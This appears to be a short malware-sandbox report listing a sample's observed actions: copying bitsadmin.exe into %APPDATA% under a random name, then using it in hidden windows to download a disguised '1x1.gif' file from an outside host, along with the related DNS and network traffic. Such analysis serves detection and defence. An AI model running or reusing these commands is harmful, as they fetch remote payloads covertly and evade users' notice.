Technical Information
- '%APPDATA%\xalwg.exe' /transfer dLSjpw /download https://tffcoop.com/robo/01729810547/1x1.gif %APPDATA%\1x1.gif
- %APPDATA%\xalwg.exe
- 'tf##oop.com':443
- DNS ASK tf##oop.com
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\XALWg.exe (with hidden window)
- '%APPDATA%\xalwg.exe' /transfer dLSjpw /download https://tffcoop.com/robo/01729810547/1x1.gif %APPDATA%\1x1.gif (with hidden window)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\XALWg.exe